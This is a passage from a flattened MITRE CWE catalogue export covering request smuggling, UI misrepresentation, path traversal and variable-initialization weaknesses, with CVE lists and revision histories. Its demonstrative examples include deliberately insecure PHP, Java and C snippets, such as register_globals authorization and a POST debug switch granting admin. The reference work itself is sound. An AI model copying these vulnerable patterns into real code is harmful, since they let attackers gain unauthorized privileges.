Transfer-Encoding and Content-Length headers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2091 - - - CVE-2005-2092 - Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2092 - - - CVE-2005-2093 - Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2093 - - - CVE-2005-2094 - Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2094 - - - - - HTTP Request Smuggling - - - 26 - HTTP Request Smuggling - - - - - - - - - - - Request smuggling can be performed due to a multiple interpretation error, where the target is an intermediary or monitor, via a consistency manipulation (Transfer-Encoding and Content-Length headers). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Name, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Name, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes, Potential_Mitigations, Theoretical_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - HTTP Request Smuggling - Interpretation Conflict in Web Traffic (aka 'HTTP Request Smuggling') - Inconsistent Interpretation of HTTP Requests (aka 'HTTP Request Smuggling') - - - - The user interface does not correctly enable or configure a security feature, but the interface provides feedback that causes the user to believe that the feature is in a secure state. - When the user interface does not properly reflect what the user asks of it, then it can lead the user into a false sense of security. For example, the user might check a box to enable a security option to enable encrypted communications, but the software does not actually enable the encryption. Alternately, the user might provide a "restrict ALL'" access control rule, but the software only implements "restrict SOME". - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Varies by Context - - - - - CVE-1999-1446 - UI inconsistency; visited URLs list not cleared when "Clear History" option is selected. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1446 - - - - - User interface inconsistency - - - - This entry is likely a loose composite that could be broken down into the different types of errors that cause the user interface to have incorrect interactions with the underlying security feature. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Maintenance_Notes, Other_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Type - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes, Relationship_Notes, Weakness_Ordinalities - - User Interface Discrepancy for Security Feature - User Interface Discrepancy for Security Feature - - - - A UI function for a security feature appears to be supported and gives feedback to the user that suggests that it is supported, but the underlying functionality is not implemented. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Varies by Context - - - - - Testing - Perform functionality testing before deploying the application. - - - - - CVE-2000-0127 - GUI configuration tool does not enable a security option when a checkbox is selected, although that option is honored when manually set in the configuration file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0127 - - - CVE-2001-0863 - Router does not implement a specific keyword when it is used in an ACL, allowing filter bypass. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0863 - - - CVE-2001-0865 - Router does not implement a specific keyword when it is used in an ACL, allowing filter bypass. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0865 - - - CVE-2004-0979 - Web browser does not properly modify security setting when the user sets it. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0979 - - - - - Unimplemented or unsupported feature in UI - - - - This issue needs more study, as there are not many examples. It is not clear whether it is primary or resultant. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-12-28 - updated Other_Notes, Potential_Mitigations, Research_Gaps - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Time_of_Introduction - - - - - A UI function is obsolete and the product does not warn the user. - - - - - - - - - Implementation - - - - - Other - Quality Degradation - Varies by Context - - - - - Architecture and Design - Remove the obsolete feature from the UI. Warn the user that the feature is no longer supported. - - - - - Obsolete feature in UI - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The UI performs the wrong action with respect to the user's request. - - - - - - - - - Implementation - - - - - Other - Quality Degradation - Varies by Context - - - - - Testing - Perform extensive functionality testing of the UI. The UI should behave as specified. - - - - - CVE-2001-1387 - Network firewall accidentally implements one command line option as if it were another, possibly leading to behavioral infoleak. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1387 - - - CVE-2001-0081 - Command line option correctly suppresses a user prompt but does not properly disable a feature, although when the product prompts the user, the feature is properly disabled. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0081 - - - CVE-2002-1977 - Product does not "time out" according to user specification, leaving sensitive data available after it has expired. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1977 - - - - - The UI performs the wrong action - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - A software system that accepts path input in the form of multiple internal dot ('file...dir') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Multiple Internal Dot - 'file...dir' - - - SFP16 - Path Traversal - - - - An improper attempt to remove the internal dots from the string could lead to CWE-181 (Incorrect Behavior Order: Validate Before Filter). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Path Issue - Multiple Internal Dot - 'file...dir' - - - - The UI has multiple interpretations of user input but does not prompt the user when it selects the less secure interpretation. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Varies by Context - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Multiple Interpretations of UI Input - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - - - The user interface (UI) does not properly represent critical information to the user, allowing the information - or its source - to be obscured or spoofed. This is often a component in phishing attacks. - - If an attacker can cause the UI to display erroneous data, or to otherwise convince the user to display information that appears to come from a trusted source, then the attacker could trick the user into performing the wrong action. This is often a component in phishing attacks, but other kinds of problems exist. For example, if the UI is used to monitor the security state of a system or network, then omitting or obscuring an important indicator could prevent the user from detecting and reacting to a security-critical event. - UI misrepresentation can take many forms: - - - Incorrect indicator: incorrect information is displayed, which prevents the user from understanding the true state of the software or the environment the software is monitoring, especially of potentially-dangerous conditions or operations. This can be broken down into several different subtypes. - Overlay: an area of the display is intended to give critical information, but another process can modify the display by overlaying another element on top of it. The user is not interacting with the expected portion of the user interface. This is the problem that enables clickjacking attacks, although many other types of attacks exist that involve overlay. - Icon manipulation: the wrong icon, or the wrong color indicator, can be influenced (such as making a dangerous .EXE executable look like a harmless .GIF) - Timing: the software is performing a state transition or context switch that is presented to the user with an indicator, but a race condition can cause the wrong indicator to be used before the product has fully switched context. The race window could be extended indefinitely if the attacker can trigger an error. - Visual truncation: important information could be truncated from the display, such as a long filename with a dangerous extension that is not displayed in the GUI because the malicious portion is truncated. The use of excessive whitespace can also cause truncation, or place the potentially-dangerous indicator outside of the user's field of view (e.g. "filename.txt .exe"). A different type of truncation can occur when a portion of the information is removed due to reasons other than length, such as the accidental insertion of an end-of-input marker in the middle of an input, such as a NUL byte in a C-style string. - Visual distinction: visual information might be presented in a way that makes it difficult for the user to quickly and correctly distinguish between critical and unimportant segments of the display. - Homographs: letters from different character sets, fonts, or languages can appear very similar (i.e. may be visually equivalent) in a way that causes the human user to misread the text (for example, to conduct phishing attacks to trick a user into visiting a malicious web site with a visually-similar name as a trusted site). This can be regarded as a type of visual distinction issue. - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Non-Repudiation - Access Control - Hide Activities - Bypass Protection Mechanism - - - - - Implementation - Input Validation - Perform data validation (e.g. syntax, length, etc.) before interpreting the data. - - - Architecture and Design - Output Encoding - Create a strategy for presenting information, and plan for how to display unusual characters. - - - - - CVE-2004-2227 - Web browser's filename selection dialog only shows the beginning portion of long filenames, which can trick users into launching executables with dangerous extensions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2227 - - - CVE-2001-0398 - Attachment with many spaces in filename bypasses "dangerous content" warning and uses different icon. Likely resultant. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0398 - - - CVE-2001-0643 - Misrepresentation and equivalence issue. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0643 - - - CVE-2005-0593 - Lock spoofing from several different weaknesses. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0593 - - - CVE-2004-1104 - Incorrect indicator: web browser can be tricked into presenting the wrong URL - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1104 - - - CVE-2005-0143 - Incorrect indicator: Lock icon displayed when an insecure page loads a binary file loaded from a trusted site. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0143 - - - CVE-2005-0144 - Incorrect indicator: Secure "lock" icon is presented for one channel, while an insecure page is being simultaneously loaded in another channel. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0144 - - - CVE-2004-0761 - Incorrect indicator: Certain redirect sequences cause security lock icon to appear in web browser, even when page is not encrypted. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0761 - - - CVE-2004-2219 - Incorrect indicator: Spoofing via multi-step attack that causes incorrect information to be displayed in browser address bar. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2219 - - - CVE-2004-0537 - Overlay: Wide "favorites" icon can overlay and obscure address bar - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0537 - - - CVE-2005-2271 - Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. "origin validation error" of a sort? - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2271 - - - CVE-2005-2272 - Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. "origin validation error" of a sort? - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2272 - - - CVE-2005-2273 - Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. "origin validation error" of a sort? - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2273 - - - CVE-2005-2274 - Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. "origin validation error" of a sort? - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2274 - - - CVE-2001-1410 - Visual distinction: Browser allows attackers to create chromeless windows and spoof victim's display using unprotected Javascript method. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1410 - - - CVE-2002-0197 - Visual distinction: Chat client allows remote attackers to spoof encrypted, trusted messages with lines that begin with a special sequence, which makes the message appear legitimate. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0197 - - - CVE-2005-0831 - Visual distinction: Product allows spoofing names of other users by registering with a username containing hex-encoded characters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0831 - - - CVE-2003-1025 - Visual truncation: Special character in URL causes web browser to truncate the user portion of the "user@domain" URL, hiding real domain in the address bar. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1025 - - - CVE-2005-0243 - Visual truncation: Chat client does not display long filenames in file dialog boxes, allowing dangerous extensions via manipulations including (1) many spaces and (2) multiple file extensions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0243 - - - CVE-2005-1575 - Visual truncation: Web browser file download type can be hidden using whitespace. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1575 - - - CVE-2004-2530 - Visual truncation: Visual truncation in chat client using whitespace to hide dangerous file extension. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2530 - - - CVE-2005-0590 - Visual truncation: Dialog box in web browser allows user to spoof the hostname via a long "user:pass" sequence in the URL, which appears before the real hostname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0590 - - - CVE-2004-1451 - Visual truncation: Null character in URL prevents entire URL from being displayed in web browser. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1451 - - - CVE-2004-2258 - Miscellaneous -- [step-based attack, GUI] -- Password-protected tab can be bypassed by switching to another tab, then back to original tab. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2258 - - - CVE-2005-1678 - Miscellaneous -- Dangerous file extensions not displayed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1678 - - - CVE-2002-0722 - Miscellaneous -- Web browser allows remote attackers to misrepresent the source of a file in the File Download dialog box. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0722 - - - - - UI Misrepresentation of Critical Information - - - - - - - This entry should be broken down into more precise entries. See extended description. - Misrepresentation problems are frequently studied in web browsers, but there are no known efforts for classifying these kinds of problems in terms of the shortcomings of the interface. In addition, many misrepresentation issues are resultant. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-13 - Critical - Defined several different subtypes of this issue. - - - CWE Content Team - MITRE - 2014-02-18 - updated Applicable_Platforms, Description, Maintenance_Notes, Name, Observed_Examples, Other_Notes, References, Relationships, Research_Gaps - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Observed_Examples, References, Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes, Observed_Examples - - UI Misrepresentation of Critical Information - - - - The software, by default, initializes an internal variable with an insecure or less secure value than is possible. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Modify Application Data - An attacker could gain access to and modify sensitive data or system information. - - - - - System Configuration - Disable or change default settings when they can be used to abuse the system. Since those default settings are shipped with the product they are likely to be known by a potential attacker who is familiar with the product. For instance, default credentials should be changed or the associated accounts should be disabled. - - - - - This code attempts to login a user using credentials from a POST request: - - - - // $user and $pass automatically set from POST request - if (login_user($user,$pass)) {$authorized = true;} - ... - - if ($authorized) {generatePage();} - - Because the $authorized variable is never initialized, PHP will automatically set $authorized to any value included in the POST request if register_globals is enabled. An attacker can send a POST request with an unexpected third value 'authorized' set to 'true' and gain authorized status without supplying valid credentials. - Here is a fixed version: - - $user = $_POST['user'];$pass = $_POST['pass'];$authorized = false;if (login_user($user,$pass)) {$authorized = true;} - ... - - - - This code avoids the issue by initializing the $authorized variable to false and explicitly retrieving the login credentials from the $_POST variable. Regardless, register_globals should never be enabled and is disabled by default in current versions of PHP. - - - - - Insecure default variable initialization - - - - This overlaps other categories, probably should be split into separate items. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-06-21 - updated Maintenance_Notes, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Time_of_Introduction - - - - - The software initializes critical internal variables or data stores using inputs that can be modified by untrusted actors. - A software system should be reluctant to trust variables that have been initialized outside of its trust boundary, especially if they are initialized by users. The variables may have been initialized incorrectly. If an attacker can initialize the variable, then they can influence what the vulnerable system will do. - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Modify Application Data - An attacker could gain access to and modify sensitive data or system information. - - - - - Implementation - Input Validation - A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking (e.g. input validation) is performed when relying on input from outside a trust boundary. - - - Architecture and Design - Avoid any external control of variables. If necessary, restrict the variables that can be modified using an allowlist, and use a different namespace or naming convention if possible. - - - - - In the Java example below, a system property controls the debug level of the application. - - int debugLevel = Integer.getInteger("com.domain.application.debugLevel").intValue(); - - If an attacker is able to modify the system property, then it may be possible to coax the application into divulging sensitive information by virtue of the fact that additional debug information is printed/exposed as the debug level increases. - - - This code checks the HTTP POST request for a debug switch, and enables a debug mode if the switch is set. - - $debugEnabled = false;if ($_POST["debug"] == "true"){$debugEnabled = true;} - /.../ - - function login($username, $password){if($debugEnabled){echo 'Debug Activated';phpinfo();$isAdmin = True;return True;}} - - Any user can activate the debug mode, gaining administrator privileges. An attacker may also use the information printed by the phpinfo() function to further exploit the system. . - This example also exhibits Information Exposure Through Debug Information (CWE-215) - - - - - CVE-2000-0959 - Does not clear dangerous environment variables, enabling symlink attack. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0959 - - - CVE-2001-0033 - Specify alternate configuration directory in environment variable, enabling untrusted path. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0033 - - - CVE-2001-0872 - Dangerous environment variable not cleansed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0872 - - - CVE-2001-0084 - Specify arbitrary modules using environment variable. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0084 - - - - - External initialization of trusted variables or values - - - SFP25 - Tainted input to variable - - - - Overlaps Missing variable initialization, especially in PHP. - - This is often found in PHP due to register_globals and the common practice of storing library/include files under the web document root so that they are available using a direct request. - - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Applicable_Platforms, Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Description - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - External Initialization of Trusted Variables or Values - External Initialization of Trusted Variables - - - - The software does not exit or otherwise modify its operation when security-relevant errors occur during initialization, such as when a configuration file has a format error, which can cause the software to execute in a less secure fashion than intended by the administrator. - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Other - Modify Application Data - Alter Execution Logic - The application could be placed in an insecure state that may allow an attacker to modify sensitive data or allow unintended logic to be executed. - - - - - Implementation - Follow the principle of failing securely when an error occurs. The system should enter a state where it is not vulnerable and will not display sensitive error messages to a potential attacker. - - - - - The following code intends to limit certain operations to the administrator only. - - $username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {$uid = ExtractUserID($state);} - - # do stuff - if ($uid == 0) {DoAdminThings();} - - If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to "0" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident. - - - - - CVE-2005-1345 - Product does not trigger a fatal error if missing or invalid ACLs are in a configuration file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1345 - - - - - Non-exit on Failed Initialization - - - - Under-studied. These issues are not frequently reported, and it is difficult to find published examples. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - - - The software does not initialize critical variables, which causes the execution environment to use unexpected values. - - - - - - - - - - - - - - - Implementation - - - - - Integrity - Other - Unexpected State - Quality Degradation - Varies by Context - The uninitialized data may be invalid, causing logic errors within the program. In some cases, this could result in a security problem. - - - - - Implementation - Check that critical variables are initialized. - - - Testing - Use a static analysis tool to spot non-initialized variables. - - - - - This function attempts to extract a pair of numbers from a user-supplied string. - - void parse_data(char *untrusted_input){ - int m, n, error;error = sscanf(untrusted_input, "%d:%d", &m, &n);if ( EOF == error ){die("Did not specify integer value. Die evil hacker!\n");} - /* proceed assuming n and m are initialized correctly */ - - - } - - This code attempts to extract two integer values out of a formatted, user-supplied input. However, if an attacker were to provide an input of the form: - - 123: - - then only the m variable will be initialized. Subsequent use of n may result in the use of an uninitialized variable (CWE-457). - - - Here, an uninitialized field in a Java class is used in a seldom-called method, which would cause a NullPointerException to be thrown. - - private User user;public void someMethod() { - - - // Do something interesting. - ... - - // Throws NPE if user hasn't been properly initialized. - String username = user.getName(); - } - - - - This code first authenticates a user, then allows a delete command if the user is an administrator. - - if (authenticate($username,$password) && setAdmin($username)){$isAdmin = true;} - /.../ - - if ($isAdmin){deleteUser($userToDelete);} - - The $isAdmin variable is set to true if the user is an admin, but is uninitialized otherwise. If PHP's register_globals feature is enabled, an attacker can set uninitialized variables like $isAdmin to arbitrary values, in this case gaining administrator privileges by setting $isAdmin to true. - - - In the following Java code the BankManager class uses the user variable of the class User to allow authorized users to perform bank manager tasks. The user variable is initialized within the method setUser that retrieves the User from the User database. The user is then authenticated as unauthorized user through the method authenticateUser. - - public class BankManager { - - - - // user allowed to perform bank manager tasks - private User user = null;private boolean isUserAuthentic = false; - - // constructor for BankManager class - public BankManager() {...} - - // retrieve user from database of users - public User getUserFromUserDatabase(String username){...} - - // set user variable using username - public void setUser(String username) {this.user = getUserFromUserDatabase(username);} - - // authenticate user - public boolean authenticateUser(String username, String password) {if (username.equals(user.getUsername()) && password.equals(user.getPassword())) {isUserAuthentic = true;}return isUserAuthentic;} - - // methods for performing bank manager tasks - ... - } - - However, if the method setUser is not called before authenticateUser then the user variable will not have been initialized and will result in a NullPointerException. The code should verify that the user variable has been initialized before it is used, as in the following code. - - public class BankManager { - - - - // user allowed to perform bank manager tasks - private User user = null;private boolean isUserAuthentic = false; - - // constructor for BankManager class - public BankManager(String username) {user = getUserFromUserDatabase(username);} - - // retrieve user from database of users - public User getUserFromUserDatabase(String username) {...} - - // authenticate user - public boolean authenticateUser(String username, String password) { - if (user == null) {System.out.println("Cannot find user " + username);}else {if (password.equals(user.getPassword())) {isUserAuthentic = true;}}return isUserAuthentic; - } - - - - // methods for performing bank manager tasks - ... - - - - } - - - - This example will leave test_string in an - unknown condition when i is the same value as err_val, - because test_string is not initialized - (CWE-456). Depending on where this code segment appears - (e.g. within a function body), test_string might be - random if it is stored on the heap or stack. If the - variable is declared in static memory, it might be zero - or NULL. Compiler optimization might contribute to the - unpredictability of this address. - - char *test_string; - if (i != err_val) - { - test_string = "Hello World!"; - } - printf("%s", test_string); - - When the printf() is reached, - test_string might be an unexpected address, so the - printf might print junk strings (CWE-457). - - To fix this code, there are a couple approaches to - making sure that test_string has been properly set once - it reaches the printf(). - One solution would be to set 